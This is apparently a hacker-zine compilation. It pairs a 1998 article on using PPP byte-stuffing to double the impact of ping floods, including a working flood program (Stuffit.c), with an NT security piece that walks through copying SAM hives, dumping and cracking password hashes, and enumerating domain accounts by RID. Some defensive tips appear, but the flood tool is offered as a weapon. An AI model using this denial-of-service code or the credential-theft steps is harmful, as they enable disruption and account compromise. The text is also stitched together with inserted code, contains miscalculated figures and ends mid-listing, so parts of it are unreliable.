The group stands behind these actions 100%, although the actions taken were those of the members alone who decided to impose action in a conformed fashion towards China. No one should be denied the right to view, or access, data which is condignly theirs. This article is just another method by which data that is otherwise restricted from the end viewer can be discerned. All in all, remember the information is out there, and it belongs to us. Join us in the fight to keep all data free. Keep the government(s) from impertinently tampering with rules and regulations that go against our rights as inhabitants of this nation, as a society, as a PUBLIC of the U.S.A (or whatever other country)... Band together, and speak out in numbers before your right to speak is contraband entirely.

Areas of Interest:
 link to effnet
 list the wired article
 list the cnn article
 list the msnbc article
 Article on Firewalls
 list the antionline article
 list the HongKong blondes article
 List both
 List the Human rights article
 List article on firewalls
 http://www.rootfest.org - Lecture on Firewall Security, and

-----------------------------------------------------------------------------------
- Steve Stakton

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploiting PPP Frame Byte-Stuffing                               Noc-Wage
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 --------------------------------------------------------------
 |            Exploiting PPP frame Byte-Stuffing              |
 |                        -*- or -*-                          |
 |         How to get twice the bytes for your buck           |
 |                   Noc-Wage    12/10/98                     |
 --------------------------------------------------------------

Introduction:

This paper will explain how you can use PPP frame byte stuffing to your advantage to increase the bandwidth consumed by the victim, but not the bandwidth of the routers in between, during a large-size packet flood. This paper isn't being produced to encourage the kiddies out there to use Denial of Service attacks. The real reason is to help turn weapons like ping -f into more efficient and more selective weapons of mass destruction, so that if they are used, they will be more effective.
The basic layout of this paper will be as follows:

 - Introduction (Already passed it)
 - Explanation of Bandwidth Based Packet Flood Attacks
 - Brief overview of a PPP HDLC frame
 - Explanation of Byte Stuffing and Worst case overhead
 - Conclusion
 - Modified pingflood.c

--------
Explanation of Bandwidth Based Packet Flood Attacks

Bandwidth based packet floods are simply a fast succession of large packets used to consume bandwidth and block legitimate network traffic. A popular method of attack is the classic ping -f. This attack is the scourge of the internet. The reason is that this attack is a "carpet bombing" based attack and can result in much wider disruption than intended by the user. What some of these users don't realize is that while the end victim's connection clogs like a freeway at rush hour, the attacker's huge amounts of traffic have to pass over many networks and routers before they reach their intended victim. This damages the speed of the internet as a whole and can lead to entire routes being temporarily inaccessible until the attack has ended.

What's proposed in this article is a way of lowering the strain put on the points in between while still having the same disruptive effect on the end victim. We can take an ordinary 500 byte ECHO_REQUEST packet and, using worst case overhead, double its size by the time the end victim receives it.

--------
Brief overview of a PPP HDLC frame

I'm not going to go into a large discussion on why and how PPP frames are created. If you would like to know more I'd suggest reading RFC 1662, "PPP in HDLC-like Framing".

PPP frames begin and end with the Flag Sequence, the binary sequence 01111110 (hexadecimal 0x7E); this value cannot be inside of the PPP frame or . After this follows the Address field, which will usually contain 11111111 (0xFF), the All-Stations address. The Control field follows the Address (Addr) field; the Control (Cntrl) field usually contains the binary value 00000011 (0x03).
Next is the Protocol field, which can be 8 or 16 bits. This is used to identify what kind of information is encapsulated within the PPP frame's Information field. For a listing of protocol values see RFC 1340, "Assigned Numbers". After the Protocol field is the Information (Info) field; this is where datagrams of up to 1500 bytes in size are encapsulated in the PPP frame. This is followed by the Frame Check Sequence, used to verify that the frame's data was not corrupted. The final Flag Sequence is then transmitted to end the PPP frame.

PPP Frame example:

 | Flag | Addr | Ctrl | Protocol | Info | FCS       | Flag |
 | 0x7E | 0xFF | 0x03 | 8/16 bit |  *   | 16/32 bit | 0x7E |

After looking at the PPP frame you see that it begins and ends with a 0x7E, and herein lies its vulnerability. There is a risk that within a packet you will find the value 0x7E; this could cause problems in that it may be mistaken for the Flag Sequence that indicates the end of the PPP frame. To eliminate this problem we introduce Byte-Stuffing.

--------
Explanation of Byte Stuffing

As explained in the PPP frame explanation, there is a risk that certain illegal values will end up in the information of a PPP frame. To solve this problem byte-stuffing is used. In the case of PPP frames the illegal value is changed to two bytes. One is the value 01111101 (0x7D); the other is the illegal character XOR'd with 0x20. In the case of 0x7E it will become 0x7D, 0x5E. This also requires any 0x7D which was not added by the PPP daemon to be encoded in the same manner, to avoid corrupting valid data.

What this means is that a single byte (for example 0x7E) will be converted into a pair of bytes (0x7D, 0x5E), but only when encapsulated in PPP frames. If 4 bytes in the datagram are 0x7E then each of those 4 bytes will be converted into the 0x7D, 0x5E pair. This results in the 4 bytes being turned into 8 bytes when encapsulated in a PPP frame. This added data is known as "overhead".
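An added example, my code and not Noc-Wage's, that implements the RFC 1662 stuffing rule just described together with the FCS-16 and the frame layout from the table above, so you can measure the overhead of a given Info field on your own link: ordinary data stays close to its original size, while a field filled with 0x7E comes out exactly twice as long. It follows the RFC's default ACCM, which also escapes the control characters 0x00-0x1F; the constants and function names are mine.

```python
import os

FLAG = 0x7E                  # frame delimiter, never allowed inside a frame
ESC = 0x7D                   # control escape byte
XOR = 0x20                   # an escaped byte is sent as ESC, byte ^ 0x20
DEFAULT_ACCM = 0xFFFFFFFF    # RFC 1662 default: escape all control chars 0x00-0x1F
PPP_GOODFCS16 = 0xF0B8       # running FCS over a frame that includes its own FCS


def needs_escape(b, accm=DEFAULT_ACCM):
    """True if byte b must be stuffed: 0x7E, 0x7D, or a control char the ACCM selects."""
    return b in (FLAG, ESC) or (b < 0x20 and ((accm >> b) & 1) == 1)


def stuff(payload, accm=DEFAULT_ACCM):
    """Byte-stuff payload: every illegal byte becomes the pair (0x7D, byte ^ 0x20)."""
    out = bytearray()
    for b in payload:
        if needs_escape(b, accm):
            out += bytes((ESC, b ^ XOR))
        else:
            out.append(b)
    return bytes(out)


def unstuff(stuffed):
    """Reverse stuff(); a stray flag or a dangling escape is a framing error."""
    out = bytearray()
    it = iter(stuffed)
    for b in it:
        if b == FLAG:
            raise ValueError("flag byte inside frame")
        if b == ESC:
            try:
                b = next(it) ^ XOR
            except StopIteration:
                raise ValueError("escape at end of frame") from None
        out.append(b)
    return bytes(out)


def ppp_fcs16(data, fcs=0xFFFF):
    """Running FCS-16 of RFC 1662 (reflected 0x1021 polynomial), no final complement."""
    for b in data:
        fcs ^= b
        for _ in range(8):
            fcs = (fcs >> 1) ^ 0x8408 if fcs & 1 else fcs >> 1
    return fcs


def build_frame(info, protocol=0x0021, accm=DEFAULT_ACCM):
    """Flag | Addr 0xFF | Ctrl 0x03 | Protocol | Info | FCS (low byte first) | Flag."""
    body = bytes((0xFF, 0x03)) + protocol.to_bytes(2, "big") + bytes(info)
    fcs = ppp_fcs16(body) ^ 0xFFFF
    body += bytes((fcs & 0xFF, fcs >> 8))
    return bytes((FLAG,)) + stuff(body, accm) + bytes((FLAG,))


def parse_frame(raw):
    """Unstuff and verify a frame; returns the Info field or raises ValueError."""
    if len(raw) < 8 or raw[0] != FLAG or raw[-1] != FLAG:
        raise ValueError("missing flag sequence")
    body = unstuff(raw[1:-1])
    if ppp_fcs16(body) != PPP_GOODFCS16:
        raise ValueError("bad FCS")
    return body[4:-2]        # strip Addr, Ctrl, the 2-byte Protocol and the FCS


def overhead_ratio(info, accm=DEFAULT_ACCM):
    """Bytes on the wire per byte of Info, counting only the stuffing expansion."""
    return len(stuff(info, accm)) / len(info)


if __name__ == "__main__":
    random_info = os.urandom(500)          # like ping's random padding
    worst_info = bytes((FLAG,)) * 500      # like ping -p 7e -s 500
    print("random  :", overhead_ratio(random_info))
    print("all 0x7E:", overhead_ratio(worst_info))   # prints 2.0
```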
The implication of this is that maliciously engineered packets could be made to exploit the byte-stuffing method and cause a worst case overhead of 100%. This means that a packet could literally double in size when encapsulated in a PPP frame. A 1024-byte ECHO_REQUEST could seem like 2048 bytes. This means that an attacker requires half the bandwidth to cause the same amount of disruption. This also means that if an attacker is on a PPP connection and is attempting this attack, he will find that he requires as much bandwidth to transmit the packets as the victim requires to receive them.

To test this idea all you need to do is send two packets, one containing random data, the second containing only 0x7E, or any of the following: 0x7D, 0xFF, all considered illegal values in datagrams in a PPP frame. Watch your ppp interface (for linux, pppstats -w 1 is good) and look at the number of bytes. Below is the actual output of pppstats on my ppp interface while I'm using linux's ping to send the two packets:

Regular packet using ping's random padding method:
created with: ping -c 1 -s 500 xxx.xxx.xxx.xxx

      in  pack  comp  uncomp  err |   out  pack  comp  uncomp   ip
       0     1     0       0    0 |   537     1     0       0    1

Malicious packet padded with 0x7E
created with: ping -p 7e -c 1 -s 500 xxx.xxx.xxx.xxx

      in  pack  comp  uncomp  err |   out  pack  comp  uncomp   ip
       0     1     0       0    0 |  1025     1     0       0    1

--------
Conclusion

Using this method attackers can lower the actual number of bytes traveling from point A to point B without the attack losing its effectiveness. Any device connecting with PPP is possibly vulnerable to this specialized attack. But this goes beyond simply PPP: any data-link layer protocol which uses byte-stuffing for illegal values would be vulnerable to similar exploitation.

A paper I discovered while researching this attack describes a way to prevent byte-stuffing attacks from being as effective: "Consistent Overhead Byte Stuffing" by Stuart Cheshire and Mary Baker.
In it they present several ways to use more efficient byte stuffing. You can download a copy at:

http://deathstar.stanford.edu/~cheshire/papers/COBS/

Noc-Wage -*- wage@idirect.ca
12/10/98

--------
Modified pingflood.c

pingflood.c was a program which showed a flaw in linux's ping which allowed regular users to trick ping into flooding using alert signals. I've modified it so that you can set the illegal character it uses as well as the size of the packets.

/*
  Stuffit.c   Noc-Wage -*- wage@idirect.ca   12/12/98

  This is just a modified version of:
     pingflood.c by (AntireZ) Salvatore Sanfilippo
     enhanced by David Welton

  I simply made it so that it will generate the ping packets so that they
  contain 0x7e which is an illegal character in PPP frames.  I also made it
  so you could set the size of the packet.

  Hopefully this came with my Keen Veracity article, but in case it didn't
  here is part of it so you understand why this even exists:

  Explanation of Byte Stuffing

  As explained in the PPP frame explanation there is a risk that certain
  illegal values will end up in the information of a PPP frame.  To solve
  this problem byte-stuffing is used.  In the case of PPP frames the illegal
  value is changed to two bytes.  One is the value 01111101 (0x7D), the other
  is the illegal character XOR'd with 0x20.  In the case of 0x7E it will
  become 0x7D, 0x5E.  This also makes any 0x7D which was not added by the PPP
  daemon be encoded in the same manner to avoid corrupting valid data.

  What this means is that a single byte (for example 0x7E) will be converted
  into a pair of bytes (0x7D, 0x5E) but only when encapsulated in PPP frames.
  If 4 bytes in the datagram are 0x7E then each of those 4 bytes will be
  converted into the 0x7D, 0x5E pair.  This results in the 4 bytes being
  turned into 8 bytes when encapsulated in a PPP frame.  This added data is
  known as "overhead".

  The implication of this is that maliciously engineered packets could be
  made to exploit the byte-stuffing method and can cause a worst case
  overhead of 100%.  This means that a packet could literally double in size
  when encapsulated in a PPP frame.  A 1024-byte ECHO_REQUEST could seem like
  2048 bytes.  This means that an attacker requires half the bandwidth to
  cause the same amount of disruption.  This also means that if an attacker
  is on a PPP connection and is attempting this attack he will also find that
  he requires as much bandwidth to transmit the packets as the victim
  requires to receive them.

  If you don't understand why this is a bad thing then don't bother using
  this program because you'll most likely use it ineffectively.
*/
#include <stdio.h>      /* the header names were stripped from the original listing */
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>

#define PING "/bin/ping"

int main(int argc, char *argv[])
{
    int pid_ping;

    if (argc < 4)   /* the original tested argc < 3 but then used argv[3] */
    {
        printf("use: %s host size pattern (I'd suggest 7e or 7d)\n", argv[0]);
        exit(0);
    }

    if (!(pid_ping = fork()))
        execl(PING, "ping", argv[1], "-s", argv[2], "-p", argv[3], (char *)0);

    if (pid_ping <= 0)
    {
        printf("pid <= 0\n");
        exit(1);
    }

    sleep(1);   /* give it a second to start going */

    while (1)
        if (kill(pid_ping, SIGALRM))
            exit(1);
}

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NT Security - Tips & Techniques                                  Neathack
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

GREETS TO YOU ALL MY BROTHERS/SISTERS FROM "NeaTHack or NtWaK0"

To me a hacker isn't just someone doing "illegal" things like cracking other people's passwords or breaking into some computer to steal information. I think a hacker is everybody interested in experimenting with computers or the telephone network.

Quote: "Any Grandma can call herself a hacker when she's able to program her VCR"

I am glad to share with you some nice NT Administration tips and techniques. Before getting into the heart of it I would like to introduce the NT model and what an NT DOMAIN is about. That will allow you to get at least some idea what I am going to talk about laterz.
The following M1cro$oft products can share their resources in workgroups:

 · W1nd0wz for Workgroups
 · W1nd0wz 95
 · W1nd0wz NT Workstation
 · W1nd0wz NT Server

Organizations that are large, or that want more control over their networks, need something more than workgroups. Therefore, M1cro$oft has incorporated the domain concept into W1nd0wz NT Server.

--Domains--

Domains borrow concepts from workgroups and from directory services. Like workgroups, domains can be fairly informal and can be administered using a mix of central and local controls. Domains can evolve fairly easily and can be set up with less planning than typically is required for a directory.

Like a directory, a domain organizes the resources of several servers into one administrative structure. Users are given logon privileges to a domain rather than to each individual server. Because a domain controls the resources of several servers, it is easier to administer than a network with many stand-alone servers.

Servers within the domain advertise their services to users. Users who log on to a domain gain access to all resources in the domain for which they have been granted access. They can browse the resources in a domain much as they would browse the resources in a workgroup; however, domains are hosted by W1nd0wz NT Servers and can be made more secure than workgroups.

When networks become large enough to require several domains, administrators can establish trust relationships among domains. Trust relationships simplify administration because a user is required to have an account in only one domain. Other domains that trust the user's logon domain can rely on the logon domain to authenticate the user's logon.

W1nd0wz NT Server domains are not the same as domains found on TCP/IP networks. TCP/IP domains are discussed in Chapter 16, "Using TCP/IP."

--Domains and Trust Relationships--

Domains are essentially improved workgroups. Access to domain resources is controlled by a domain controller.
The user is assigned a single domain account and a password that is used to control access to all domain resources. W1nd0wz NT Server domains also support the use of groups, which enable administrators to assign and change permissions for large numbers of users more efficiently. You will learn about managing users and groups in Chapter 11, "Managing Users and Groups."

--Domains and Domain Servers--

A server in a domain has one of three roles:

 · One W1nd0wz NT Server stores the master copy of the domain's user and group database. The PDC is responsible for synchronizing the account database with all BDCs.
 · Other W1nd0wz NT Servers can store backup copies of the domain's user and group database.
 · Servers can participate in a domain without being designated as primary or backup domain controllers.

Each of these roles is described more fully in the following sections.

--The Primary Domain Controller--

The first W1nd0wz NT Server in the domain is configured as a primary domain controller (PDC). The User Manager for Domains utility is used to maintain user and group information for the domain. This information is stored in a domain security database on the primary domain controller.

--Backup Domain Controllers--

Other W1nd0wz NT Servers in the domain can serve as backup domain controllers (BDCs). Each backup domain controller stores a replica of the database on the primary domain controller, which is replicated periodically to distribute changes made to the main database on the PDC.

Replication of the database has several advantages. If the primary domain controller experiences a hardware failure, one of the backup domain controllers can be promoted to the primary role. Having one or more backup domain controllers builds a degree of fault tolerance into your network. Each domain should have at least one BDC.

Backup domain controllers also can participate in the logon process.
When a user logs on to a domain, the logon request can be handled by any primary or backup domain controller. This spreads the logon processing load across the available servers and improves logon performance. This can be an important benefit in domains with large numbers of users.

Changes cannot be made to the domain database unless the PDC is functioning. If the PDC fails or is shut down for maintenance, you can promote a BDC to function as the PDC. Although the PDC is required to make changes to the domain database, other domain operations are not dependent on the PDC. Users can log on to the domain using a BDC if the PDC is unavailable.

--Servers--

Computers running W1nd0wz NT Server can also function as independent or stand-alone servers, which may or may not participate in domains. The term "servers" here means member servers or stand-alone servers. These servers do not function as primary or backup domain controllers. They can take advantage of the user and group databases that are maintained for a domain, however, and you can assign user and group permissions for the server using the User Manager for Domains.

The server also can maintain its own database of users, and users can log on to the server independently of the domain. When this is done, the server cannot utilize the user and group database of a domain, and the server handles accounts much like computers running W1nd0wz NT Workstation.

You might choose to configure a stand-alone W1nd0wz NT Member Server for several reasons:

 · The server can be administered by different staff members. Many W1nd0wz NT Servers are used as application servers, such as SQL databases. If you configure a database server as an independent server, you can assign a member of your database staff as the server administrator.
 · Attending to logon requests can use a significant part of a server's processing capability.
   If you configure the server as an independent server, it can concentrate on servicing a single function, such as providing application services.
 · When a server is functioning as a primary or backup domain controller, it is difficult to move the server to a new domain. If there is a chance the server will move to a different domain, configure it as an independent server.

--Domain Models--

Proper use of trust relationships enables organizations to build enterprise networks that still require only a single logon procedure for resource access. M1cro$oft has defined four models for domain trust relationships. If you are configuring a multi-domain network, you will want to consider the merits and disadvantages of each model.

There are two reasons for adding domains:

 · For organizational reasons
 · To improve network performance

Regarding network performance, you will find that M1cro$oft's descriptions are a bit vague. You can use a single domain model, for example, "if your network doesn't have too many users..." That doesn't give you much help during the planning stages. Unfortunately, there are many variables, and it is difficult to come up with a simple prescription for adding domains. W1nd0wz NT Server can, after all, run on everything from an Intel 80486 PC to a multiprocessor RISC system. Such a broad range of hardware makes performance generalizations difficult. Fortunately, W1nd0wz NT Server domains make it easy to reorganize the LAN as it grows.

The four domain models defined by M1cro$oft follow:

 · Single domain
 · Master domain
 · Multiple-master domains
 · Complete trust

A single domain network has several advantages:

 · It is easier to manage because resources are centralized.
 · No trust relationships are required.
 · Group definitions are simpler.
You need to consider a multi-domain model in the following situations:

 · If browsing is slow
 · If too many users are degrading performance
 · If your organization wants to assign domains to departments
 · If you want to have some resources in their own domains

--The Master Domain Model--

The master domain model designates one domain to manage all user accounts. The master domain also supports global groups. Global groups can export group information to other domains. By defining global groups in the master domain, other domains can import the group information easily.

In this example, the master domain is named Keystone, and is managed centrally by the MIS staff. All users are defined in Keystone, as well as some groups that will make administration easier. Only the primary and backup domain controllers in the Keystone domain are used to store user and group account information. Because users cannot log on to the network without a working domain account database, a master domain always should include at least one backup domain controller in addition to the primary domain controller.

When users log on to the network, they always log on to the Keystone master domain. After they have logged on, they can access resources in other domains that trust Keystone.

--The Multiple Master Domain Model--

Each master domain supports about half the user accounts. This spreads the processing of logons over several domains. Each domain supports some of the groups that are accessed by the department domains.

Under this model, each master domain trusts every other master domain. This is a convenience for administrators, but is necessary for users only if they actually will be using resources on one of the master domains, which is not ordinarily the case. To reduce the likelihood of security holes, only administrators should be given permissions to access resources in the master domains. Users should be given permissions only in the department domains.

Each department domain trusts each master domain.
It is not necessary for department domains to trust each other.

Because users are granted most privileges based on their memberships in master domain groups, it is a good idea to group related users into the same master domains. All your users in Accounting should log on to the same master domain, for example. Otherwise, you are forced to establish similar groups in each master domain. With more groups, it becomes far more difficult to establish privileges in the department domains.

The multiple master domain model has many desirable features:

 · It is scalable to any organizational size.
 · Security is managed centrally.
 · Departments can manage their local domains, if desired.
 · Related users, groups, and resources can be grouped logically into domains.

Disadvantages of the multiple master domain model include the following characteristics:

 · The number of groups and trust relationships multiplies rapidly as the number of domains increases.
 · User accounts and groups are not located in a single location, complicating network documentation.

--The Complete Trust Model--

The master domain models assume that a central department exists that can take responsibility for managing user and group security for the complete organization.

In the complete trust model, every domain is configured to trust every other domain. Users log in to their department domains and then access resources in other departments by means of trust relationships. As with the multiple master domain model, the number of trust relationships required increases rapidly as domains increase. Three domains require six trust relationships (two between each pair of domains), whereas five domains require 20 trust relationships. If n is the number of domains, then the network requires n × (n-1) trust relationships.

If your organization does not have a central MIS department, networking is a great reason for establishing one.
Besides the need to maintain tight security, several other functions are best when centralized. Here are some examples:

 · File backup
 · Communications services
 · E-mail maintenance
 · Management of the network infrastructure (media, hubs, and so on)

Few departments have personnel who possess the expertise to do these jobs well. Also, network management in a large organization calls for personnel who are devoted completely to the task. Therefore, I don't put much credibility into the advantages that M1cro$oft attributes to the complete trust model, but here they are nevertheless:

 · No central MIS department is required.
 · The model scales to any organizational size.
 · Departments retain control of their users and resources. (But, it can be argued, they surrender that control by trusting everybody.)
 · Users and resources are grouped logically by departments.

--Estimating Domain Capacity--

All the issues come down to the size of the file that is used to store the Security Accounts Manager (SAM) domain database. The size of the SAM database file matters because the entire database is made resident in a domain controller's RAM. Large SAM databases have two effects: they hog a lot of the domain controller's RAM, and they take a long time to load, prolonging the process of booting the computer.

Three types of objects are stored in the SAM domain database:

 · User accounts use 1,024 bytes (1 KB) each.
 · Computer accounts use 512 bytes (0.5 KB) each (only W1nd0wz NT computers require computer accounts).
 · Global group accounts use 512 bytes plus 12 bytes per user.
 · Local group accounts use 512 bytes plus 36 bytes per user.

Assume that you have 1,000 users and 500 NT computers that require accounts. To organize the domain, you require 10 global groups with an average membership of 200 users. You also require 10 local groups with an average membership of 20. How large a SAM database would that generate?
   1,000 users                × 1,024 bytes = 1,024,000 bytes
     512 computer accounts    ×   512 bytes =   262,144 bytes
      10 global groups        ×   512 bytes =     5,120 bytes
   2,000 global group members ×    12 bytes =    24,000 bytes
      10 local groups         ×   512 bytes =     5,120 bytes
     200 local group members  ×    36 bytes =     7,200 bytes
   --------------------------------------------------------------
   Total SAM database size                  = 1,324,589 bytes

The total size of the SAM database would be approximately 1.5 MB. That's not particularly large as SAM databases go, and you can easily support this network in a single domain.

Depending on its processing power and on the services it provides, a domain controller can support between 2,000 and 5,000 users. A domain with 26,000 users, therefore, might require from 6 to 13 domain controllers to ensure adequate performance.

Now Let US do some NT Administration

GOAL ONE: Gain Access to the SAM

Users can gain access to the SAM and Security hives in several ways. M1cro$oft says the best way to protect your NT systems is to protect the administrator accounts, but administrators are not the only users who can access the SAM and Security hives. Server operators, backup operators, and even ordinary domain users can view and dump hash codes from the Registry. Protecting administrator accounts is not enough.

By default, no user has the proper permissions to access or even view the NT SAM. However, the SAM and Security hives are like other files. Users who have permission to copy the Registry files--such as users who might have to back up the Registry--can copy and manipulate these files on a whim.

If you log on as a backup operator, however, you can't just copy the SAM and Security hives. The Registry is open while NT is running, and a sharing violation occurs when you attempt to copy the files. However, the Regback utility on the W1nd0wz NT resource kit CD-ROMs lets anyone in the administrator, server operator, or backup operator local groups copy the open Registry. The list of potentially dangerous users, however, includes more than these three groups.
Regular domain users can invade NT security if NT is on a FAT volume and they have permission to restart the machine. All they have to do is boot to DOS, copy the SAM and Security hives from the %SystemRoot%\System32\config directory, and they're in business.

In general, if NT is on an NTFS volume, domain users can't boot DOS and copy the hives. But NTFSDOS, a utility written by Mark Russinovich and Bryce Cogswell, lets users mount NTFS volumes in DOS. (Mark Russinovich and Bryce Cogswell present one view of NTFSDOS and Joel Sloss another view in point and counterpoint articles in the September 1996 issue.) Run NTFSDOS, go to the %SystemRoot%\System32\config directory, and copy the hives.

M1cro$oft says that true security is physical security. Following M1cro$oft's advice, lock the machines away, and remove ordinary users' permissions to restart the computers. If users can't restart the machines, the possibility of rebooting to DOS on a FAT volume or using NTFSDOS is no longer a threat.

Is NT secure now? Ordinary domain users can't copy the open Registry because the action will cause a sharing violation. Nor can users back up the system, because they don't have the permissions associated with administrator, server operator, or backup operator accounts. But a fundamental feature of NT's built-in availability is the Repair directory. After a successful installation and each time you run the Rdisk utility, NT stores a backup of the Registry in %SystemRoot%\Repair. The backup files aren't open, and users can easily copy them if they can log on locally or if the directory is shared. By default, the NTFS permissions don't protect the Repair directory. All users have read control, and read control offers enough permission to copy files.

For ordinary users to obtain the SAM hive that contains passwords, they must access the current version of the Registry. The Registry is vulnerable in at least two ways.
First, even though NT doesn't back up the Security and SAM hives by default when you run Rdisk, a copy of the SAM from the original NT installation remains in the Repair directory. If the administrator has not changed the administrative password since the original installation, the password is at risk. Second, many administrators use the rdisk /s command, which includes the Security and SAM hives in a backup to an unprotected Repair directory (for more information about the Rdisk utility, see Michael D. Reilly, "The Emergency Repair Disk," January 1997).

In summary, here's how you can prevent an ordinary domain user from gaining access to the SAM and Security hives on your servers:

 * Don't permit local logon to servers.
 * Use NTFS volumes instead of FAT volumes.
 * Physically secure the servers.
 * Change the default permissions of the Repair directory.
 * Secure your Emergency Repair Disks and tape backups.

Remember, users can still access their local machine's Registry through the Repair directory or an Emergency Repair Disk and attempt to crack the local machine's administrator password. One way to prevent this attack is to convert to NTFS and set more restrictive permissions on each workstation's Repair folder.

GOAL TWO: Dump the Hash Codes

Even after users have copies of the SAM and Security hives, they can't easily view hash codes. They have to log on to an NT machine as Administrator and dump the hash codes with PWDUMP. If they manually copy both Registry files into their own Registry, NT will use the hijacked SAM. Although users don't have administrative privileges at work, they are administrators on their home PC. From their home PC, they can dump the hash codes and, at their leisure, perform as many dictionary attacks as they need to find the passwords.

To copy the hijacked SAM to a local Registry when NT is on a FAT volume, users just boot to DOS and copy the file.
If NT is on an NTFS volume, users can use Regrest, another utility on the resource kit CD-ROMs. However, the hives in the Repair directory or on an Emergency Repair Disk are compressed, and a compressed Registry doesn't work in NT. But the compression algorithm isn't difficult; you can easily uncompress those files with the Expand command in %SystemRoot%\System32. If users replace the SAM and attempt to log on as the hijacked Administrator, they overwrite their personal administrative password and don't know the new, stolen password. However, the utility NT Locksmith, available at http://www.winternals.com, lets you change the local administrator password. Running this utility requires physical access to the NT machine. Most people do not have physical access to servers at work, but they do have access to their home PC. After users change the password, they can log on locally and dump the hash codes from the hijacked SAM.

GOAL THREE: Crack NT's Passwords

Once users have the hash codes, they can use NT Crack, L0phtCrack, or a similar utility to perform a dictionary attack against NT. The outcome of the password crack depends on the quality of the wordlist, or dictionary, hackers use to perform the crack. The more words, dates, numbers, and wordplays in the list, and the more complex they are, the better the chance of a successful crack. Therefore, a good password security policy greatly reduces the likelihood of a successful crack. For good password security, you can prohibit blank passwords and require a certain password length, for example a six-character minimum. Require complex passwords, usually a random selection of letters and numbers. NT's User Manager won't let you force complex passwords; however, you can set all your users' passwords manually and not let users change them.

Now Let US have Fon with da SID.

Originally this was found by David LeBlanc and Dominique Brezinski.
Evgenii Borisovich Rudnyi pointed this out again. He wrote two utilities, user2sid and sid2user, which are actually command line interfaces to the WIN32 functions LookupAccountName and LookupAccountSid. So, no hacking, just what is permitted by MS. Now, it happens that to use these functions a user just has to be a member of EVERYONE. It means that an ordinary user can find, without a problem, the built-in domain administrator name, which MS recommends we rename from Administrator to something else (see, for example, course 803, Administrating W1nd0wz NT 4.0). Assuming that the user's computer is in the domain, the task is solved in two steps.

1) Look up the SID of any domain account, for example Domain Users:

   user2sid "domain users"
   S-1-5-21-201642981-56263093-24269216-513

   Now we know all the subauthorities for the current domain. All the domain account SIDs differ by the last number only (the so-called RID).

2) Look up the built-in administrator name (the RID is always 500):

   sid2user 5 21 201642981 56263093 24269216 500
   Name is SmallUser
   Domain is DomainName
   Type of SID is SidTypeUser

Now it is possible to look up all the domain accounts from the very first one (RID = 1000 for the first account, 1001 for the second, and so on; RIDs are never reused for the current installation):

   sid2user 5 21 201642981 56263093 24269216 1000
   sid2user 5 21 201642981 56263093 24269216 1001
   ...

It should be interesting for everyone to know the history of the development of the domain account database. Well, this is not the end of the story. The anonymous logon is also in the EVERYONE group. This means that it is actually possible to find out who the built-in administrator is and to see the history of the SAM at any domain into which you can run an anonymous session. Note that anonymous sessions are not audited by the logon/logoff category. Below is an example of what you can learn provided the NetBIOS ports are open (the listing is fictional).
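As an added defender-side example (my code, not the article's and not Rudnyi's utilities; it calls no Win32 API and works on SID strings already collected), the following parses SIDs of the form shown above into domain part and RID, prints the argument list sid2user expects, and, given the name/SID pairs an administrator has enumerated from their own domain, reports which account really holds RID 500 whatever it has been renamed to and which RIDs in the 1000+ range are gaps (deleted accounts, since RIDs are never reused). The sample accounts are constructed to match the fictional listing that follows.

```python
import re
from dataclasses import dataclass

# Well-known RIDs. 500 (built-in Administrator), 513 (Domain Users) and the
# 1000+ range for ordinary accounts are the values the article relies on; the
# other entries are standard NT RIDs, included for completeness.
WELL_KNOWN_RIDS = {
    500: "built-in Administrator",
    501: "built-in Guest",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
}
FIRST_USER_RID = 1000

# S-<revision>-<identifier authority>-<subauthority>...-<RID>
SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


@dataclass(frozen=True)
class Sid:
    revision: int
    authority: int
    subauthorities: tuple

    @property
    def rid(self):
        """Relative identifier: the last subauthority, the only part that
        differs between accounts of the same domain."""
        return self.subauthorities[-1]

    @property
    def domain(self):
        """Domain part shared by every account SID in the domain."""
        return self.subauthorities[:-1]

    def sid2user_args(self):
        """Argument list in the form sid2user takes: the identifier
        authority followed by each subauthority."""
        return " ".join(str(x) for x in (self.authority,) + self.subauthorities)


def parse_sid(text):
    m = SID_RE.match(text.strip())
    if m is None:
        raise ValueError("not a textual SID: %r" % text)
    subs = tuple(int(x) for x in m.group(3).lstrip("-").split("-"))
    return Sid(int(m.group(1)), int(m.group(2)), subs)


def audit_accounts(accounts):
    """accounts: (name, sid_string) pairs enumerated from one domain.
    Returns the account that is the built-in Administrator by RID, the
    names behind other well-known RIDs, and RIDs missing from the 1000+
    sequence (deleted accounts, since RIDs are never reused)."""
    parsed = [(name, parse_sid(sid)) for name, sid in accounts]
    if len({sid.domain for _, sid in parsed}) != 1:
        raise ValueError("accounts do not all belong to the same domain")
    report = {"admin_account": None, "admin_renamed": False,
              "well_known": {}, "deleted_rids": []}
    user_rids = set()
    for name, sid in parsed:
        if sid.rid in WELL_KNOWN_RIDS:
            report["well_known"][WELL_KNOWN_RIDS[sid.rid]] = name
        if sid.rid == 500:
            report["admin_account"] = name
            report["admin_renamed"] = name.lower() != "administrator"
        elif sid.rid >= FIRST_USER_RID:
            user_rids.add(sid.rid)
    if user_rids:
        expected = set(range(FIRST_USER_RID, max(user_rids) + 1))
        report["deleted_rids"] = sorted(expected - user_rids)
    return report


# Constructed sample, modelled on the fictional XYZ_domain listing in the article.
SAMPLE_ACCOUNTS = [
    ("Domain Users", "S-1-5-21-201642981-56263093-24269216-513"),
    ("XYZAdmin",     "S-1-5-21-201642981-56263093-24269216-500"),
    ("Simpson",      "S-1-5-21-201642981-56263093-24269216-1001"),
    ("Flanders",     "S-1-5-21-201642981-56263093-24269216-1003"),
]

if __name__ == "__main__":
    for name, sid in SAMPLE_ACCOUNTS:
        parsed = parse_sid(sid)
        print("%-14s RID %5d  sid2user %s" % (name, parsed.rid, parsed.sid2user_args()))
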